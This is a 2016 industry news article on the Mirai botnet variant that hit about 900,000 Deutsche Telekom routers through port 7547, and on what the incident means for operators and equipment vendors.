Your browser is not supported. Please update it.

1 December 2016

Deutsche Telekom operator meltdown as Mirai botnet attacks

Open-source is a wonderful thing, but perhaps not when it comes to malware – at least for Deutsche Telekom, which has come under fire from an adapted form of Mirai that went hunting for their consumer broadband WiFi routers. It’s the first sign of a looming debacle for CPE providers, and one that could seriously harm operator reputations.

Now, hopefully, Deutsche Telekom (DT) has the ability to remotely push software and firmware updates to the devices, to help mitigate against this attack in future. The lack of an OTA update option was one of the main reasons why Mirai took off in the IoT, as it was hijacking devices with poor default credentials that were often hard-coded to the device – meaning that Mirai can’t really be removed once it has infected the device.

The scale of the attack, some 900,000 routers according to Germany’s BSI, should worry every operator that has ever placed a connected device inside a consumer home. Lawsuits are almost certainly going to begin cropping up if businesses think they can prove damages caused by insecure field equipment, but a more pressing concern might be that of tarnished reputation. Think of Samsung’s gloomy smartphone future in the wake of its Note 7 inferno fiasco.

The new version of Mirai, according to the SANS Technology Institute, has been adapted to target a vulnerability in the Simple Object Access Protocol (SOAP), instead of just spamming the box with combinations of default login credentials. The attack uses port 7547 to get into the router, and then attack the login interface, before closing port 7547 so that other malware can’t use the same vulnerability to get in.

As for responses, DT has issued patches for its SpeedPort W 921V and SpeedPort W 723V Type B routers, and is offering a day-pass for mobile internet for customers while they have their WiFi boxes updated. If it’s a quick and easy fix, then DT shouldn’t have too much to worry about in terms of churn – but imagine the PR ramifications if one of these DDoS attacks can be linked to a death caused by such an internet outage. In an increasingly hyper-connected world, the possibility of such a thing happening only grows with time.

Elsewhere, Xiphos Research’s Darren Martyn has told The Register that CPE from Eircom (Ireland) and TalkTalk (UK) are vulnerable to a proof-of-concept attack that allows remote takeovers via port 7547 on their ZyXEL routers. Martyn believes that devices from T-Com (DT’s provider for its SpeedPort line), Aztech, Digicom, and MitraStar are also at risk. That’s not good news for operators, and should hopefully be causing some headaches behind-the-scenes as they try to work out a solution to this particular problem.

In theory, it should be a simple fix – a small software patch, and getting the customer to change the login credentials from what is almost certainly the same password that was shipped in the box. For those without the infrastructure to swiftly issue such a patch, well things might get a little grim.

But if the industry learns a painful lesson, Mirai could be a useful tool for change – forcing suppliers and providers to get their ship in order. With the malware becoming increasingly complex, now with two MIPS and an ARM version, locking down home gateways with adequate (preferably outstanding) security would go a long way to securing the wider IoT, as homes are going to become increasingly connected.